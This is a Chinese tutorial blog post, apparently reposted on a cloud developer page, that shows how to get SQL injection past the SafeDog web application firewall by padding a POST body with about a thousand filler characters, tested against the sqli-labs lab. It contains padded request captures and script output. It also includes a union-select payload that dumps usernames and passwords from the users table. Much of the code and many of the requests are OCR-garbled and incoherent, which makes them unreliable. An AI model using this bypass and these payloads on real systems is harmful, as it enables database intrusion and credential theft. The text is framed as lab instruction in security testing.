SQL注入-安全狗超大数据包绕过

本文涉及的产品
云原生大数据计算服务MaxCompute,500CU*H 100GB 3个月
云原生大数据计算服务 MaxCompute,5000CU*H 100GB 3个月
简介: SQL注入-安全狗超大数据包绕过

测试版本:apache3.5.12048版本




0x01 测试条件


这个是get请求的,要求对方可以接收post请求,也就是说对方应该是REQUEST接收方式。

测试所使用的靶场为sqli-labs靶场

需要对sql注入的流程清楚,如果基础只是比较薄弱的同学,请移步到以下链接地址进行学习sqli-labs

https://space.bilibili.com/29903122

image.png

Nm<LO

<?php

//includingtheMysqlconnectparameters.

include("../sq1-connections/sgl-connect.php"

errorreporting(0)

I

take

id"]))

if(iss($

REQUEST

SiP-SREQUEST['id"];

connectionparameterstoafileforanalysis

//1oggingt

the

$fp-fopen('resuit.txt',a)

fwrite($pID:Sidn

fa1ose($fp);

4

25

//

connectivity

在发送请求的时候,要将bp的请求方式修改为post型

image.png

Headers

Params

Hex

Raw

POSThttp://10.211.55.9/Less-1/HTTP/1.1

User-Agent:Mozilla/5.0Macintoh;x

Gecko/20100101Firefox/83.0

Accept:

text/html,appication/xhtml+xm.alication/xmq.w/

Accept-Language:

zh-cNzhq..

Accept-encoding:gzip,deflate

DNT:1

Connection:close

cookie:safedog-flowitmB997255C2337E9B4E56A9ECAB186C267

Upgrade-lnsecure-Requests:1

Content-Type:application/x-www-form-urlencoded

Content-Length:4072

id--1

image.png

Headers

Params

Hex

Raw

POSThttp://10.211.55.9/Less-1/HTTP/1.1

User-Agent:Mozilla/5.0Macintoh;x

Gecko/20100101Firefox/83.0

Accept:

text/html,appication/xhtml+xm.alication/xmq.w/

Accept-Language:

zh-cNzhq..

Accept-encoding:gzip,deflate

DNT:1

Connection:close

cookie:safedog-flowitmB997255C2337E9B4E56A9ECAB186C267

Upgrade-lnsecure-Requests:1

Content-Type:application/x-www-form-urlencoded

Content-Length:4072

id--1

将安全狗的cc防攻击功能关闭,放置在测试中因为请求次数过多被ban

image.png

网站安全狗CAPAC版)3.5正式版本

加入服云

网站安全狗

精报

资源保护

网马查杀

IP黑白名单

流量保护

防护日志

主动防御

CC攻击防护

修改拦截提示信息

cC攻击防护功能已关闭

人.

保存

智能拦截非法的网站攻击请求,保护网站安全

访问规则设置访问上限

+口

+

网站白名单

路径白名单

秒内(1-60)允许最大请求数目

10

100

5

分钟

IP冻结时间:

分钟

IP放行时间:

30

会话验证设置验证访问者合法性规则

启用智能验证模式

初级模式:该模式对攻击验证判断较为宽松

(正常情况下推荐使用该模式).

代理规则设置代理访问规则

最大IP数

(-1允许,0禁止)

30

时间周期

秒(1-60)

1

网马库版本:2016-01-15

检查更新

主程序版本:3.5,12048

0x02 代码


 

截图:4位字母从991开始就可以绕过了

image.png

53foriin.range(991,992):

str(lcrow']

/*

问题

调试控制台

输出

终端

984

userful

not

userful

985

not

userful

986

not

987

not

userful

988

not

userful

989

not

userful

userful

990

not

payloadlength:

userful

[+]

991

current

payloadlength:

userful

992

+]

current

payloadlength:

userful

993

+]

CurrenT

userfulpayload

length:994

+

Current

userfulpayload

length:995

+]

Current

userfulpayload

length:996

+

current

userfulpayload

length:99

997

+

Current

userfulpayload

Length:998

+

Current

userfulpayload

length:C

999

+

Current

userfulpayload

Length;

1000

+

CurrenT

userfulpayload

length:

1001

+

CurrenT

rful

Length:

1002

payload

+

CurrenT

use

rfulpayload

Length:

1003

+

Current

uS

navload

1A0A

ength.

991基础版:

crow * 4  

当然,这里可以将crow换成任意的4个普通字符(最好不要特殊字符)


0x03 手动测试


image.png

3

ME

4

10.211.55.9/Less1/id-la

Send

Cancel

Reguest

Raw

ParamsHeaders

Hex

POSThtt://10.211.55.9Less-/HP/1.1

WelcomeDhakkan

Host:10.211.55.9

YourLoginname:2

User-Agent:Mozilla/5.0Mcintocx

Gecko/20100101Firefox/83.0

YourPassword:security

Accept:

text/html.application/xhtml+xmlapplication/xmlg-0.9imwe.8

Accept-Language:

SQLIDUMB

zh-cN.zh.

Accept-Encoding:gzip,deflate

DNT:1

Connection:close

Cookiesafdog-flowitm997255233794E56A9ECAB186C267

Upgrade-lnsecure-Requests:1

Content-Type:applircation/x-www-formurlencoded

可无障碍环境

你网络

0内存

存储

制台

样式编辑器

性能

词试器

AdblockPr

HackBar

Content-Length:51

odingSQL-xSSOTHER

id--1

CROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCIOWC

ttp://10.211.55.9/Less-/id--unionelct2taba

FOWCROWCROWCROWCROWCYOWCROWCYOWCROWCROWCROWCROWCROWCROWCROWCROWCRO

WCIOWCOWCIOWCIOWCROWCIOWCROWCROWCIOWCROWCIOWCIOWCROWCIOWCIOWCROWC

OWCROWCROWCROWCROWCROWCROWCUOWCROWCUOWCROWCROWCROWCROWCROWCROWCRO

WCOWCIOWCIOWCROWCIOWCIOWCROWCIOWCIONCROWCIOWCIOWCROWCIOWCIOWCROWC

PostdataDRefereroUserAgentOCookies

ClearAll

TOWCROWCROWCIOWCROWCIOWCROWCROWCROWCROWCROWCROWCYOWCROWCROWCROWCRO

WCROWCROWCIOWCROWCROWCROWCROWCOWCROWCROWCIOWCROWCROWCIOWCROWCROWC

FOWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCIOWCIOWCO

WCIOWCOWCIOWCIOWCROWCIOWCROWCIOWCIOWCEOWCIONCROWCIOWCROWCIOWCIOWC

OWCIOWCIOWCIOWCIOWCIOWCIOWCIOWCIOWCIOWCIOWCIOWCIOWCIOWCIOWCIOWCEO

WCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWE

ROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCRO

WCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWE

FOWCROWCOWCOWCROWCOWCROWCROWCOWCROWCOWCROWCROWCROWCROWCOWCO

WCIOWCROWCIOWCIOWCROWCIOWCROWCIOWCROWCROWCIONCROWCIOWCROWCROWCIOWC

TOWCROWCOWCROWCROWCROWCROWCIOWCROWCUOWCROWCROWCIOWCROWCIOWCROWCEO

WCIOWCOWCIOWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWC

TOWCROWCIOWCROWCIOWCROWCROWCROWCROWCUOWCROWCROWCOWCROWCOWCROWCRO

WCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCIOWCROWCROWCROWCROWCROWC

OWCOWCIOWCIOWCIOWCIOWCIOWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCCO

WCIOWCOWCOWCIOWCEOWCIOWCOWCIOWCIOWCEOWCIOWCEOWCOWCIOWCEOWCIOWC

0matc

Typeasearchterm

继续测试:

group_concat(concat_ws(0x7e,username,password)) from security.users --+

image.png

Reguest

Response

Hex

Render

Headers

HTML

Raw

Headers

Params

Hex

Raw

YOWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCIOWCROWCIOWCROWCEO

<IDOCTYPEhtmLPUBLICW3C|/DTDXHTML1.0Tansitional/EN"

WCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWC

"http://www.w3.g//xhtml/DTD/xhtm/l-transtionld

YOWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCIOWCROWCRO

<htmlxmlns-"http://www.w3.org/1999/xhtml>

WCIOWCROWCIOWCROWCROWCROWCROWCROWCIOWCROWCIOWCROWCIOWCROWCROWCROWC

<head>

YOWCIOWCOWCIOWCIOWCROWCIOWCROWCROWCROWCROWCROWCROWCRIOWCROWCROWCRO

<metahttp-equiv-content-Typecontent-text/htmlcharset-utf-82

WCIOWCROWCIOWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWC

<title>Less-1**ErrorBased-stringtitle>

YOWCIOWCROWCEOWCIOWCROWCROWCROWCROWCROWCRONCROWCIOWCROWCIOWCROWCRO

</head>

WCIOWCROWCROWCROWCROWCROWCRIOWCROWCRIOWCIOWCRIOWCIOWCROWCIOWCROWCIOWC

YOWCIOWCROWCIOWCIOWCIOWCIOWCROWCIOWCROWCIOWCROWCIOWCEOWCIOWCEOWCEO

<bodybgcolor#000000'>

WCIOWCROWCIOWCROWCROWCROWCRIOWCROWCROWCROWCROWCIOWCROWCIOWCROWCIOWC

<divstyle-"margin-top:70pxicolor.#FFF;font-size:23px

YOWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCIOWCROWCROWCROWCRO

text-align:centerwelcomenbsp&inbspnpotcolo

WCIOWCOWCIOWCROWCIOWCROWCIOWCROWCIOWCTOWCIOWCTOWCIOWCTOWCIOWCIOWC

Dhakkan</font><br>

YOWCIOWCROWCEOWCIOWCEOWCROWCROWCIOWCROWCIOWCOWCIOWCIOWCEOWCIOWCEO

<fontsize-"3"color-"#FFFFoO">

WCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCEOWCIOWCROWCIOWCROWCIOWCROWC

YOWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCRO

WCIOWCOWCTOWCOWCIOWCROWCIOWCEOWCIOWCOWCIOWCTOWCIOWCTOWCOWCIOWC

YOWCIOWCROWCIOWCIOWCROWCIOWCROWCROWCROWCIOWCROWCROWCROWCROWCROWCRO

WCIOWCOWCIOWCROWCROWCROWCIOWCEOWCIOWCEOWCIOWCHOWCIOWCEOWCIOWCHOWC

YOWCIOWCROWCIOWCIOWCROWCIOWCROWCROWCROWCIOWCROWCIOWCIOWCIOWCIOWCEO

WCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCOWCIOWCTOWCIOWCTOWCIOWCIOWC

YOWCIOWCROWCIOWCIOWCIOWCIOWCROWCROWCROWCYOWCROWCIOWCROWCIOWCROWCRO

WCIOWCROWCIOWCROWCROWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCROWC

<Fontsize-5color#99FfoOYourLoginnaMe.2<Your

[owCrOWCOWCONCROWCEOWCROWCROWCROWCOWCROWCROWCROWCIOWCEOWCIOWCO

PasswordDumb-Dumbnin-i-uwere

WCIOWCROWCIOWCROWCROWCROWCIOWCROWCIOWCROWCROWCIOWCROWCIOWCROWCIOWC

YOWCIOWCROWCIOWCIOWCROWCROWCROWCROWCROWCIONCROWCIOWCIOWCIOWCIOWCEO

rappy,tuid-stuidityuiuli

n.dmini~admin1.dmin~dminimi.kku

WCIOWCOWCIOWCOWCIOWCIOWCEIOWCIOWCEIOWCIOWCRIOWCIOWCROWCIOWCROWCIOWC

min4~admin4</fontu/font<divx/brxbrxibrccenter

YOWCROWCROWCROWCROWCROWCROWCROWCROWCROWCIOWCROWCIOWCROWCIOWCROWCEO

<imgsrc-../iages/Less-1jpg>kcenter>

WCIOWCROWCROWCROWCROWCROWCRIOWCROWCRIOWCROWCRIOWCIOWCROWCIOWCROWCIOWC

/body

YOWCYOWCROWCEOWCRIOWCROWCROWCROWCROWCROWCROWCROWCROWCROWCROWCIOWCRO

/html

WCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCROWC

YOWCYOWCROWCROWCROWCROWCRYOWCROWCROWCROWCROWCROWCYOWCROWCROWCROWCRO

WCIOWCOWCIOWCROWCIOWCROWCIONCROWCIOWCTOWCIONCTOWCIOWCTOWCIOWCROWC

YOWCIOWCROWCIOWCIOWCROWCROWCROWCROWCROWCIOWCROWCIOWCROWCROWCIOWCO

WCIOWCOWCIOWCROWCROWCROWCIOWCROWCIOWCEOWCIOWCROWCIOWCROWCIOWCROWC

YOWCIOWCROWCIOWCIOWCIOWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCIOWCROWCEO

wcrow/unionselect1.2unctw

fromsecurity.users

成功


0x04 对应视频


微信在线观看(腾讯视频上传的视频好像不可以上传作为一个系列的教程):

01_sql注入之安全狗超大数据包bypass


02_sql注入之安全狗超大数据包bypass


03_sql注入之安全狗超大数据包bypass

相关实践学习
基于MaxCompute的热门话题分析
本实验围绕社交用户发布的文章做了详尽的分析,通过分析能得到用户群体年龄分布,性别分布,地理位置分布,以及热门话题的热度。
SaaS 模式云数据仓库必修课
本课程由阿里云开发者社区和阿里云大数据团队共同出品,是SaaS模式云原生数据仓库领导者MaxCompute核心课程。本课程由阿里云资深产品和技术专家们从概念到方法,从场景到实践,体系化的将阿里巴巴飞天大数据平台10多年的经过验证的方法与实践深入浅出的讲给开发者们。帮助大数据开发者快速了解并掌握SaaS模式的云原生的数据仓库,助力开发者学习了解先进的技术栈,并能在实际业务中敏捷的进行大数据分析,赋能企业业务。 通过本课程可以了解SaaS模式云原生数据仓库领导者MaxCompute核心功能及典型适用场景,可应用MaxCompute实现数仓搭建,快速进行大数据分析。适合大数据工程师、大数据分析师 大量数据需要处理、存储和管理,需要搭建数据仓库?学它! 没有足够人员和经验来运维大数据平台,不想自建IDC买机器,需要免运维的大数据平台?会SQL就等于会大数据?学它! 想知道大数据用得对不对,想用更少的钱得到持续演进的数仓能力?获得极致弹性的计算资源和更好的性能,以及持续保护数据安全的生产环境?学它! 想要获得灵活的分析能力,快速洞察数据规律特征?想要兼得数据湖的灵活性与数据仓库的成长性?学它! 出品人:阿里云大数据产品及研发团队专家 产品 MaxCompute 官网 https://www.aliyun.com/product/odps&nbsp;
相关文章
|
2月前
|
SQL 安全 数据库
惊!Python Web安全黑洞大曝光:SQL注入、XSS、CSRF,你中招了吗?
在数字化时代,Web应用的安全性至关重要。许多Python开发者在追求功能时,常忽视SQL注入、XSS和CSRF等安全威胁。本文将深入剖析这些风险并提供最佳实践:使用参数化查询预防SQL注入;通过HTML转义阻止XSS攻击;在表单中加入CSRF令牌增强安全性。遵循这些方法,可有效提升Web应用的安全防护水平,保护用户数据与隐私。安全需持续关注与改进,每个细节都至关重要。
109 5
|
2月前
|
SQL 安全 数据库
深度揭秘:Python Web安全攻防战,SQL注入、XSS、CSRF一网打尽!
在Web开发领域,Python虽强大灵活,却也面临着SQL注入、XSS与CSRF等安全威胁。本文将剖析这些常见攻击手段,并提供示例代码,展示如何利用参数化查询、HTML转义及CSRF令牌等技术构建坚固防线,确保Python Web应用的安全性。安全之路永无止境,唯有不断改进方能应对挑战。
58 5
|
2月前
|
SQL 安全 数据安全/隐私保护
Python Web安全大挑战:面对SQL注入、XSS、CSRF,你准备好了吗?
在构建Python Web应用时,安全性至关重要。本文通过三个真实案例,探讨了如何防范SQL注入、XSS和CSRF攻击。首先,通过参数化查询替代字符串拼接,防止SQL注入;其次,利用HTML转义机制,避免XSS攻击;最后,采用CSRF令牌验证,保护用户免受CSRF攻击。这些策略能显著增强应用的安全性,帮助开发者应对复杂的网络威胁。安全是一个持续的过程,需不断学习新知识以抵御不断变化的威胁。
92 1
|
2月前
|
SQL 安全 数据库
Python Web开发者必看!SQL注入、XSS、CSRF全面解析,守护你的网站安全!
在Python Web开发中,构建安全应用至关重要。本文通过问答形式,详细解析了三种常见Web安全威胁——SQL注入、XSS和CSRF,并提供了实用的防御策略及示例代码。针对SQL注入,建议使用参数化查询;对于XSS,需对输出进行HTML编码;而防范CSRF,则应利用CSRF令牌。通过这些措施,帮助开发者有效提升应用安全性,确保网站稳定运行。
44 1
|
2月前
|
SQL 安全 数据库
深度揭秘:Python Web安全攻防战,SQL注入、XSS、CSRF一网打尽!
在Web开发领域,Python虽强大灵活,但安全挑战不容小觑。本文剖析Python Web应用中的三大安全威胁:SQL注入、XSS及CSRF,并提供防御策略。通过示例代码展示如何利用参数化查询、HTML转义与CSRF令牌构建安全防线,助您打造更安全的应用。安全是一场持久战,需不断改进优化。
38 3
|
2月前
|
SQL 安全 数据库
从入门到精通:Python Web安全守护指南,SQL注入、XSS、CSRF全防御!
【9月更文挑战第13天】在开发Python Web应用时,安全性至关重要。本文通过问答形式,详细介绍如何防范SQL注入、XSS及CSRF等常见威胁。通过使用参数化查询、HTML转义和CSRF令牌等技术,确保应用安全。附带示例代码,帮助读者从入门到精通Python Web安全。
75 6
|
2月前
|
SQL 安全 JavaScript
告别Web安全小白!Python实战指南:抵御SQL注入、XSS、CSRF的秘密武器!
【9月更文挑战第12天】在Web开发中,安全漏洞如同暗礁,尤其对初学者而言,SQL注入、跨站脚本(XSS)和跨站请求伪造(CSRF)是常见挑战。本文通过实战案例,展示如何利用Python应对这些威胁。首先,通过参数化查询防止SQL注入;其次,借助Jinja2模板引擎自动转义机制抵御XSS攻击;最后,使用Flask-WTF库生成和验证CSRF令牌,确保转账功能安全。掌握这些技巧,助你构建更安全的Web应用。
41 5
|
2月前
|
关系型数据库 MySQL 网络安全
5-10Can't connect to MySQL server on 'sh-cynosl-grp-fcs50xoa.sql.tencentcdb.com' (110)")
5-10Can't connect to MySQL server on 'sh-cynosl-grp-fcs50xoa.sql.tencentcdb.com' (110)")
|
4月前
|
SQL 存储 监控
SQL Server的并行实施如何优化?
【7月更文挑战第23天】SQL Server的并行实施如何优化?
92 13
|
4月前
|
SQL
解锁 SQL Server 2022的时间序列数据功能
【7月更文挑战第14天】要解锁SQL Server 2022的时间序列数据功能,可使用`generate_series`函数生成整数序列,例如:`SELECT value FROM generate_series(1, 10)。此外,`date_bucket`函数能按指定间隔(如周)对日期时间值分组,这些工具结合窗口函数和其他时间日期函数,能高效处理和分析时间序列数据。更多信息请参考官方文档和技术资料。